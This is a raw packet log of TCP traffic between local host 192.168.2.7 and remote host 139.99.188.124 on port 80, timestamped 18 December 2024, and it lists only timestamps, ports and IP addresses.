                                                                                        Dec 18, 2024 20:55:51.080173969 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.080950022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.081429005 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.085943937 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.085949898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.086062908 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.169460058 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.169869900 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.170088053 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.171073914 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.171195030 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.172034025 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.176640034 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.176961899 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.177213907 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.181770086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.181777000 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.182166100 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.187201023 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.187210083 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.187333107 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.192563057 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.192595005 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.192991018 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.198471069 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.198477983 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.198563099 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.203533888 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.203541994 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.203666925 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.208514929 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.209005117 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.210077047 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.213952065 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.213959932 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.214039087 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.218005896 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.218014002 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.218168974 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.221662045 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.222109079 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.222345114 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.225296974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.225436926 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.228204966 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.229104042 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.229252100 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.229485989 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.232975960 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.232981920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.233167887 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.236716986 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.236839056 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.236999035 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.240648985 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.240716934 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.240938902 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.244422913 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.244554043 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.244674921 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.248258114 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.248420000 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.248677969 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.252041101 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.252310991 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.253125906 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.256042957 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.414925098 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.414933920 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.415455103 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.416203022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.416209936 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.421448946 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.421499968 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.422338009 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.424027920 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.427273989 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.427285910 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.427968025 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.430181980 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.430190086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.430403948 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.432075024 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.432086945 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.433125973 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.433131933 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.433142900 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.435220003 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.435275078 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.435297966 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.435966969 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.436600924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.437170029 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.439443111 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.439591885 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.439874887 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.439975023 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.442500114 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.442673922 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.443994045 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.445686102 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.445924044 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.448035955 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.448756933 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.448859930 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.449403048 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.451875925 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.452013969 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.452186108 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.454916000 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.455104113 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.455229998 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.457608938 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.458571911 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.458619118 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.460809946 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.460939884 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.463862896 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.463912010 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.464020014 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.466655970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.466837883 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.468038082 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.469964981 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.470113993 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.471992016 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.472865105 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.473414898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.475708961 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.475810051 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.475821018 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.475995064 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.478782892 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.478837013 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.480132103 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.481914997 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.482050896 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.484040976 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.484822035 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.486458063 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.487982035 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.488027096 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.488146067 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.490812063 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.490947962 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.491014004 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.492042065 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.493913889 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.494443893 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.496053934 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.498791933 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.498800039 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.499979019 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.504070997 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.504091024 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.508176088 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.510761976 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.510770082 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.515677929 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.515683889 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.515763044 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.516185999 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.518560886 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.518573046 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.520096064 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.520495892 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.527965069 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.633032084 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.633039951 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.633209944 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.634979963 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.644469976 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.644480944 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.644756079 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.645437956 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.645971060 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.646435022 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.646449089 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.648127079 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.648430109 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.648438931 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.648547888 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.650379896 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.650388956 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.650511026 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.652278900 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.652307987 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.653660059 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.653667927 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.655246019 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.655268908 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.655395031 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.658363104 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.658397913 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.659120083 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.659184933 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.660959959 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.661072969 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.661119938 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.663736105 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.663744926 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.663904905 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.666480064 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.666629076 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.666690111 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.669291973 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.669502974 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.669620037 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.672127962 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.672547102 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.672833920 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.675057888 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.675188065 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.675239086 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.677779913 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.678045034 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.678138971 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.680576086 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.680675030 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.680771112 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.683409929 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.683453083 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.683532953 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.686238050 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.686584949 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.686707020 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.689747095 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.689754963 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.689878941 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.695518970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.695542097 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.695617914 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.701286077 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.701304913 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.701390982 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.706623077 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.706630945 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.706732035 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.710144043 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.710151911 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.710258961 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.712049007 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.712064028 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.712131977 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.713965893 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.714912891 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.714982033 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.716918945 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.716927052 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.717015982 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.718919992 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.719913006 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.719974995 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.721688032 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.721695900 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.721750021 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.722989082 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.723844051 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.723943949 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.724767923 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.724776030 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.724843979 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.727622986 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.727636099 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.727710009 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.730580091 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.730592966 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.730649948 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.731404066 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.731429100 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.731539965 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.731957912 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.731988907 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.732037067 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.734020948 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.734129906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.734226942 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.736968040 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.737281084 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.737350941 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.739620924 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.740142107 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.740262032 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.742391109 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.743052006 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.743120909 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.745203018 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.745356083 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.745420933 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.748053074 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.748174906 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.748294115 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.751157999 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.751506090 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.751596928 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.753782988 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.753851891 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.754199982 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.756500959 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.756979942 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.757036924 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.759229898 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.759478092 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.759556055 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.762105942 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.762366056 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.762427092 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.764893055 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.764998913 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.765083075 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.767745972 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.767889023 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.767950058 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.770497084 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.770720005 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.770787954 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.773335934 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.773643970 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.773715019 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.776438951 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.776621103 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.776717901 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.778984070 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.779153109 CET8049795139.99.188.124192.168.2.7
                                                                                        Dec 18, 2024 20:55:51.779215097 CET4979580192.168.2.7139.99.188.124
                                                                                        Dec 18, 2024 20:55:51.781785011 CET8049795139.99.188.124192.168.2.7
